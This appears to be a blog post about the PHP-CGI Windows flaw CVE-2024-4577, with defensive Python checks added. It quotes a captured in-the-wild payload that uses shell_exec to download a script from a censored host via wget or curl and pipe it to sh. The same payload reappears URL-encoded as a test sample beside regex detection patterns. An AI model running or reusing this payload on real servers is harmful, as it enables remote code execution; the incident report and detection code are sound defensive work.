Two comments about this:
- Be aware that it is around, particularly if you actually run PHP.
Description from CVE record dated 9 June:
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use “Best-Fit” behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
(I can see that it says “Windows” but it can’t always be assumed that the bug will never work on Linux. In this particular case it seems as if it could really be Windows-specific.)
- My web server saw an occurrence of this, with the PHP code being
<?php shell_exec("SC=$(wget -O- http://aa.bb.cc.dd/sh || curl http://aa.bb.cc.dd/sh); echo \"\$SC\" | sh -s cve_2024_4577"); echo(md5("Hello CVE-2024-4577")); ?>
(where I’ve censored the IP address from which some dodgy first stage shell script will be downloaded)
So is this black hat, the vulnerability is being exploited in the wild, and the hacker has a sense of humour (to point me directly at the correct CVE number), or is this white hat attempting to locate vulnerable servers and warn them?
I think black hat.
(I’ve chosen not to exhibit the URL that is actually sent to the web server in order to trigger this bug.)
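Two defender-side checks that follow from the post, as an added example (not code from the post or from the PHP project): a version test against the fixed releases named in the quoted CVE record, and a signature check for the observed payload (shell_exec, fetch-and-pipe-to-sh, the CVE tag) over percent-decoded request bodies. The sample bodies are constructed; the censored IP and the indicator set are assumptions drawn only from the payload quoted above, not from the trigger URL the post withholds.

```python
import re
from urllib.parse import unquote_plus

# Fixed releases per the CVE record quoted in the post: 8.1.29, 8.2.20, 8.3.8.
# Branches outside 8.1-8.3 are not covered by the record, so they return False.
FIXED_PATCH = {(8, 1): 29, (8, 2): 20, (8, 3): 8}

def is_vulnerable_version(version: str) -> bool:
    """True if a PHP version string falls inside an affected range."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised PHP version string: {version!r}")
    major, minor, patch = map(int, m.groups())
    fixed = FIXED_PATCH.get((major, minor))
    return fixed is not None and patch < fixed

# Indicators taken from the payload quoted in the post (assumed signature set):
# a shell_exec() call, wget/curl output handed to sh, and the CVE tag itself.
INDICATORS = {
    "shell_exec": re.compile(r"shell_exec\s*\(", re.I),
    "fetch-and-pipe-to-sh": re.compile(
        r"\$\(\s*(wget|curl)\b|(wget|curl)\b[^;|]*\|\s*sh\b", re.I),
    "cve-tag": re.compile(r"cve[_-]?2024[_-]?4577", re.I),
}

def flag_request(raw: str) -> list[str]:
    """Percent-decode a logged request body and return the matching indicator names."""
    decoded = unquote_plus(raw)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

# Constructed sample bodies: the first carries the payload from the post
# (URL-encoded, IP censored as in the post), the second is a benign form submission.
SAMPLE_HIT = ("%3C%3Fphp+shell_exec(%22SC%3D%24(wget+-O-+http%3A%2F%2Faa.bb.cc.dd%2Fsh+%7C%7C+"
              "curl+http%3A%2F%2Faa.bb.cc.dd%2Fsh)%3B+echo+%5C%22%5C%24SC%5C%22+%7C+sh+-s+"
              "cve_2024_4577%22)%3B+echo(md5(%22Hello+CVE-2024-4577%22))%3B+%3F%3E")
SAMPLE_BENIGN = "name=Alice&comment=Hello+from+the+form%21"

if __name__ == "__main__":
    for v in ("8.1.28", "8.2.20", "8.3.7"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed")
    print("hit:", flag_request(SAMPLE_HIT))
    print("benign:", flag_request(SAMPLE_BENIGN))
```

Decoding before matching matters because the payload arrives in a request, so a log that stores the raw body would otherwise hide `shell_exec(` behind percent-escapes.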